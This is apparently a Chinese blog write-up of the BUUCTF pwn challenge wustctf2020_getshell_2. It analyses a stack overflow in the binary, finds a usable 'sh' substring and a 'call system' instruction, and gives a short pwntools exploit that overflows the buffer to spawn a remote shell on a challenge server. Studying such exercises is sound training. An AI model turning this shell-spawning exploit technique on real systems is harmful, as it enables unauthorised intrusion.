wustctf2020_getshell_2

m0sway

于 2021-12-13 10:34:42 发布

阅读量2.5k

点赞数 1

CC 4.0 BY-SA版权

分类专栏： BUU-PWN 文章标签：安全系统安全 pwn 网络安全信息安全

本文链接：https://blog.youkuaiyun.com/m0sway/article/details/121899924

BUU-PWN 专栏收录该内容

58 篇文章

订阅专栏

本文讲述了在WUSTCCTF2020_getshell_2任务中，通过检查和IDA分析发现了一个栈溢出漏洞。挑战者需利用system函数的间接调用，避开直接写'/bin/sh'，找到隐藏的后门地址。作者详细介绍了利用ROP技术和payload构造过程，最终实现远程shell获取。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

wustctf2020_getshell_2

使用checksec查看：
在这里插入图片描述
只开启了栈不可执行，应该和1一样是道栈溢出题目。

放进IDA中查看：
在这里插入图片描述

和1一样主函数中给出漏洞函数，漏洞函数中直接一个栈溢出。

但是后门函数并没有直接给出system(/bin/sh)，而是给了system("/bbbbbbbbin_what_the_f?ck__--??/sh")

这样就不能直接调用后门函数进行getshell。虽然没有给/bin/sh，但是这串字符串的最后sh可以用作参数，同样可以获取到shell。

记录下地址：0x08048670
在这里插入图片描述
也可以使用ROPgadget直接找出地址：

但是没法利用system@plt地址，因为plt地址需要返回值，可溢出的地址位数不够0x24-0x18=0xc，所以只能用shell()里的call system来调用system，call函数不用返回值了，它会自己把下一条指令给压进去

exp：

from pwn import *

#start
r = remote("node4.buuoj.cn",29609)
# r = process("../buu/wustctf2020_getshell_2")

#params
sh_addr = 0x08048670
system_addr = 0x08048529

#attack
payload = b'M'*(0x18+4) + p32(system_addr) + p32(sh_addr)
r.recv()
r.sendline(payload)

r.interactive()